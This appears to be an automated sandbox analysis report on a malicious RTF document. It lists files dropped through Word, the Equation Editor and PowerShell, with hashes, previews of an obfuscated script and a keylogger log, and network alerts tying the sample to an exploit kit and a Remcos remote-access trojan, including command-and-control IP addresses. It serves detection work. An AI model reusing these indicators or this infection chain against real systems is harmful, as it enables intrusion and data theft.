                                                                                                                                      Preview:....[.2.0.2.4./.1.0./.0.5. .0.8.:.5.2.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.D.S.p.W.O.K.W.7.z.n. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4760
                                                                                                                                      Entropy (8bit):4.834060479684549
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328456
                                                                                                                                      Entropy (8bit):3.756771779189027
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:pQMPv172riXF4VSjThmRdjKGdifXtf9bYWE4TxT8VU6/gZ6ZAJ:pQMP54YF4VSjTMRdjg/tf9bdTxTf64ZL
                                                                                                                                      MD5:8910DBBBB759C4FCC363E4284D7D9B34
                                                                                                                                      SHA1:8BF43D0963C8CEBCF9B67878ABA102550A9C34FF
                                                                                                                                      SHA-256:9283F0DFAA8AB8729B35651552180D82D75723F5118D2FCA42C5E35C070777BA
                                                                                                                                      SHA-512:824308975F9E7D0BCF52371C4A4022F486BA7822C6101C94C751BCDB1D8AADDC5F3BA88B398F60140C29A4A0531D28A9E2136F58647CBCEBF6CBFDCDCAD012C4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..K.R.P.Z.L.Z.K.U.j.m.Z.L.G.K.a.b.d.L.q.o.G.a.R.h.r.i.R.e.z.T.h.a.L.i.K.o.j.l. .=. .".e.L.I.K.A.o.q.I.R.C.U.B.u.s.R.S.A.R.L.a.f.x.W.K.A.d.W.T.K.s.R.U.C.k.A.l.L.L.".....d.U.m.j.i.U.i.U.u.t.j.p.G.h.p.d.T.U.t.c.b.c.k.s.c.k.P.O.L.l.g.f.t.n.n.m.L.L. .=. .".x.t.c.Z.U.W.Z.K.T.a.N.m.W.B.L.G.L.B.a.G.U.C.A.q.K.C.R.d.I.t.J.C.u.v.k.q.G.d.".....l.R.x.k.z.N.x.J.W.R.o.C.U.t.G.R.S.d.C.c.a.H.U.c.L.i.K.C.p.C.H.P.Z.K.A.A.c.U. .=. .".T.N.P.z.n.u.t.r.i.d.o.r.d.b.L.P.j.i.l.i.K.B.B.B.A.G.K.c.k.u.p.L.K.W.x.L.K.g.q.L.v.h.L.b.".....L.o.k.a.x.B.O.e.G.O.e.g.z.W.c.L.z.T.Q.k.d.C.v.L.x.U.G.O.k.O.q.W.C.G.S.m.K.b. .=. .".h.T.I.s.P.W.a.u.p.o.n.u.t.r.i.d.o.r.K.P.L.W.P.J.m.i.k.s.i.z.f.Z.l.e.L.u.s.t.k.K.K.h.Q.B.".....u.r.U.H.K.u.G.S.p.x.K.G.s.f.c.H.W.L.e.A.Q.i.i.P.L.c.t.k.m.t.L.C.n.t.L.N.m.K. .=. .".K.U.W.l.p.i.U.A.p.P.W.g.W.m.k.q.e.K.L.G.Z.G.N.b.G.Z.i.d.z.Z.L.L.n.b.q.b.P.L.".....L.i.K.W.i.e.t.U.c.L.f.e.L.l.x.m.K.C.K.J.t.r.z.G.L.h.B.n.e.L.t.L.n.v.W.s.p.k. .=. .".d.f.A.P.p.O.L.c.i.e.z.W.R.Z.U.i.G.K.m.L.L.c.K.s.p.T.b.L.e.G.
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):962
                                                                                                                                      Entropy (8bit):5.013811273052389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16384
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3::
                                                                                                                                      MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                      SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                      SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                      SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1024
                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9216
                                                                                                                                      Entropy (8bit):3.580383692048488
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Kndj6QJogD4jiEIx7TEG7dbN7DI/AvuI5FNI8lNSPanwxcaZsyHGqUxx4Juw:KdeQyp+lXEG73rn54ranwxFsDBrw
                                                                                                                                      MD5:18B8401AF400CF9E5001423B49AC1817
                                                                                                                                      SHA1:09D50A033A6D10BFB4ADBD89E230CC776B178CB0
                                                                                                                                      SHA-256:B12FFAD18D4E24D6980F44DC484E3C593D9380568EAEFB6A28A6DEC066FCC483
                                                                                                                                      SHA-512:FA27D7683F1C6250FCE8598D68AB7D342F41FBB3C3788FDBA780BD7242F6C43C4940FB456FF319DDCA0C88011CD019455B243843923B11E889FFC9B2EEDD4E2C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1.1.3.6.4.1.1.0.^...|.`.[.~.,.|.^.$.(.-.?.4.|.*.!.5.^.<.*.[.?.#.$.6.3.;.).5.#.<.?.`.0.0.?.7.1.?.].;.?.1._.~.;.?.`.%.6./.4.]...!.&././...4.>.(.9.].>.6.3.?.&.-.,._.2.2.?.!...&.%.<.|.^.^.?.<...?.?.%.#.=.)..._.%.?.].'.-.^./.|.0.`.?.!.*.?.!.0.|._.%...$.#.`.-.~.8.....3.=.|.%.[.~.@._.*.~.?.0.~.].3.3.8.?.0...=.^.8.2.?.:._.0.]...?.9.+.9.0.?.&.*.#.].!.(.[.,.=.$.?.,...+.<.~.'...0.7.).7.2.?...%.%.9.].-.?.>.].).6.,.?.9.|.7...8.4.|.0.].`.[.:.3...:...;.&.^.@.$.].%.$.,./.$.[.?.?...!...`.`...*.=.*.?.?.[.5.%.4.?.|.=.`.%.`.[.?.;.].:._.4.7.;.6.).9.8.3.@...#./.#.7.)./.|.?.?.'.,.?.7.$.<.$.%.?./.~.%.(.0...?.%.'.5.=.%.:.].9.?.0.?.%.;.(.&.0...~.3.|.5.:.[.~.,.`.7...?.=.2.1...%.^.=.0.&.?.2.$.9./.].'.:.<.1.&.2.,.:./.~.5...:.%.8...?.^.#.,.9.(.'.;.?.*.?.&.1.#.?.6.?.!.?.&./.?.*...$.3.3.(.3._.@.-.!.'.!.).?.2.>.~...'.3.5.'.%.|.^.?...2.0.].^...?._.9.4.?.$.?.:.4.@.6.^.?.$.0.>.?.:.0.8.!.8.,...?...*.&.7./.9...=.|.0.*.9.+.~.*.9.`.5.^.&.,.?.?.-.-.1.^.].#.#.9.0.6.|.7.~.3.+.%.?.#.(.|...-.<.?.|.4.2.@.6.!.~.?.8.].?.$.$...=.$.%.
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x19bf0206, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):21037056
                                                                                                                                      Entropy (8bit):1.1390580328308821
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:8O1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:8OEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                      MD5:B62D66A4CC5499909F33E17CA0F65F5A
                                                                                                                                      SHA1:A29E0248D9EAB4423A1A363924E7029D279D8D73
                                                                                                                                      SHA-256:4BCAFEC7ECE89F11C204761C13B7C8F8A8FB4A2AC4F66FC3255336B5B121CDBB
                                                                                                                                      SHA-512:53EFADA95BC96073048FEBCDBFC1FEA93393A33F86D672AD29EEE32349B5FC648887F648B6E4EFA6D1784F21AAEA20C213F8FC2FD949DA1F5D9A69D7CA8AD542
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....... ........................u..............................;:...{...5...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Sat Oct 5 11:52:44 2024, length=82352, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1014
                                                                                                                                      Entropy (8bit):4.5364669546160385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8MRdFgXg/XAlCPCHaXDKBxB/BGFX+WZxJ2uoNprIWicvb483CwY4trIGDtZ3Yilh:8Q/XTeHbktJJte7nZDv3qB57u
                                                                                                                                      MD5:8B05BC5FC732762DA4A95097490CDBB1
                                                                                                                                      SHA1:F9C9FD259062D5899358580A82430AFCB62F0A4C
                                                                                                                                      SHA-256:CC4027B27D2BD226979B0EF6C5C0BAC13B0A87CCCC3021D7DC26B5EBDF527DCE
                                                                                                                                      SHA-512:FC8701BDB884A45A60F325785E5FC32AAFD64F7914AD6FBB8FAC455E55924BA2BAD0E3B94E7257954A7689C3954FDCF2E2E804344A77EF7671ED0E5A49338700
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... ......r......r....k.x%....A...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....EY.f..user.8......QK.XEY.f*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..A..EY.f .DSPWOK~1.RTF..J.......WD..WD.*.........................D.S.p.W.O.K.W.7.z.n...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\DSpWOKW7zn.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.S.p.W.O.K.W.7.z.n...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:Generic INItialization configuration [folders]
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):55
                                                                                                                                      Entropy (8bit):4.65408698625193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:HqyyqwjLFSm4oYqwjLFSv:HZwVNHwVc
                                                                                                                                      MD5:B309D548B45524E20C3FE80A47F2D47C
                                                                                                                                      SHA1:E42682ABA9CBEED1AA1C366D0C571B8BC669E74C
                                                                                                                                      SHA-256:116D42B21886ED53B6324067D3FFF368411242CDCDDB44B636A54F415D2BB027
                                                                                                                                      SHA-512:1E3B9516EBE04D236DDC99C0BE1A5CD3E2B2532CA568AB1E6D45652A9EDFB9A91A00FA29F2511A5906781DAA2E1347295A2166D7153AF54672DA3871F6EFDE07
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[misc]..DSpWOKW7zn.LNK=0..[folders]..DSpWOKW7zn.LNK=0..
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):162
                                                                                                                                      Entropy (8bit):2.4797606462020307
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328456
                                                                                                                                      Entropy (8bit):3.756771779189027
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:pQMPv172riXF4VSjThmRdjKGdifXtf9bYWE4TxT8VU6/gZ6ZAJ:pQMP54YF4VSjTMRdjg/tf9bdTxTf64ZL
                                                                                                                                      MD5:8910DBBBB759C4FCC363E4284D7D9B34
                                                                                                                                      SHA1:8BF43D0963C8CEBCF9B67878ABA102550A9C34FF
                                                                                                                                      SHA-256:9283F0DFAA8AB8729B35651552180D82D75723F5118D2FCA42C5E35C070777BA
                                                                                                                                      SHA-512:824308975F9E7D0BCF52371C4A4022F486BA7822C6101C94C751BCDB1D8AADDC5F3BA88B398F60140C29A4A0531D28A9E2136F58647CBCEBF6CBFDCDCAD012C4
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..K.R.P.Z.L.Z.K.U.j.m.Z.L.G.K.a.b.d.L.q.o.G.a.R.h.r.i.R.e.z.T.h.a.L.i.K.o.j.l. .=. .".e.L.I.K.A.o.q.I.R.C.U.B.u.s.R.S.A.R.L.a.f.x.W.K.A.d.W.T.K.s.R.U.C.k.A.l.L.L.".....d.U.m.j.i.U.i.U.u.t.j.p.G.h.p.d.T.U.t.c.b.c.k.s.c.k.P.O.L.l.g.f.t.n.n.m.L.L. .=. .".x.t.c.Z.U.W.Z.K.T.a.N.m.W.B.L.G.L.B.a.G.U.C.A.q.K.C.R.d.I.t.J.C.u.v.k.q.G.d.".....l.R.x.k.z.N.x.J.W.R.o.C.U.t.G.R.S.d.C.c.a.H.U.c.L.i.K.C.p.C.H.P.Z.K.A.A.c.U. .=. .".T.N.P.z.n.u.t.r.i.d.o.r.d.b.L.P.j.i.l.i.K.B.B.B.A.G.K.c.k.u.p.L.K.W.x.L.K.g.q.L.v.h.L.b.".....L.o.k.a.x.B.O.e.G.O.e.g.z.W.c.L.z.T.Q.k.d.C.v.L.x.U.G.O.k.O.q.W.C.G.S.m.K.b. .=. .".h.T.I.s.P.W.a.u.p.o.n.u.t.r.i.d.o.r.K.P.L.W.P.J.m.i.k.s.i.z.f.Z.l.e.L.u.s.t.k.K.K.h.Q.B.".....u.r.U.H.K.u.G.S.p.x.K.G.s.f.c.H.W.L.e.A.Q.i.i.P.L.c.t.k.m.t.L.C.n.t.L.N.m.K. .=. .".K.U.W.l.p.i.U.A.p.P.W.g.W.m.k.q.e.K.L.G.Z.G.N.b.G.Z.i.d.z.Z.L.L.n.b.q.b.P.L.".....L.i.K.W.i.e.t.U.c.L.f.e.L.l.x.m.K.C.K.J.t.r.z.G.L.h.B.n.e.L.t.L.n.v.W.s.p.k. .=. .".d.f.A.P.p.O.L.c.i.e.z.W.R.Z.U.i.G.K.m.L.L.c.K.s.p.T.b.L.e.G.
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):162
                                                                                                                                      Entropy (8bit):2.4797606462020307
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                      SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                      File type:Rich Text Format data, version 1
                                                                                                                                      Entropy (8bit):2.5421644862138977
                                                                                                                                      TrID:
                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                      File name:DSpWOKW7zn.rtf
                                                                                                                                      File size:82'352 bytes
                                                                                                                                      MD5:26595ba1951c5b5b9b8a328be0d93f1c
                                                                                                                                      SHA1:afe1727998060a45fd092daa8189a3311d5f0823
                                                                                                                                      SHA256:7664fd0a78d92fefa3f4b1528b7f41ad6d4f4940562ce017b2402732f2cbd9cb
                                                                                                                                      SHA512:0bad5016da67ea30da803b114ccfd7371fe3d144fbdd0cd8e76ace21b5240081629a18743629caef8f6905d75b1819a53edbf0e4bf692ea417da32b8795318f9
                                                                                                                                      SSDEEP:384:Twz3TVW7qhPBzEDD68gcUz1yZaW1Xb7rrBaKEIbpKsXR5y29EWZenxgET2cf+9nv:sz3RwqEEcQ1yBXXXlEqQ+bKaEiB
                                                                                                                                      TLSH:2E83474D978F45A1CF54A337131A0A4A46FCB33EB70116B6752C437137AED2E19AA8BC
                                                                                                                                      File Content Preview:{\rtf1..{\*\M7m0vlA4EcXUgIXXZolp6ILCm20uzk9vm3QgyKMuUbMiuvp8KqkcQ9G0mvibRnmenRyvcMLbNuQSsYOB1La7vlB3Ef7RicNi4JKz0QXxZaexkhdSHLBajeU9oI8hziLsFgOBH1KkhfwXhtxinrRJ2Mc4BpgeOe7w0c4lci8kSADSrgllCwHZxPxbyJd}..{\311364110^.|`[~,|^$(-?4|*!5^<*[?#$63;)5#<?`00?71?];
                                                                                                                                      Icon Hash:2764a3aaaeb7bdbf
                                                                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                      00000119Fhno
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-10-05T14:52:57.616787+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11107.172.130.14780192.168.2.2249163TCP
                                                                                                                                      2024-10-05T14:52:57.616787+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11107.172.130.14780192.168.2.2249163TCP
                                                                                                                                      2024-10-05T14:52:59.307763+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249164185.236.203.10151525TCP
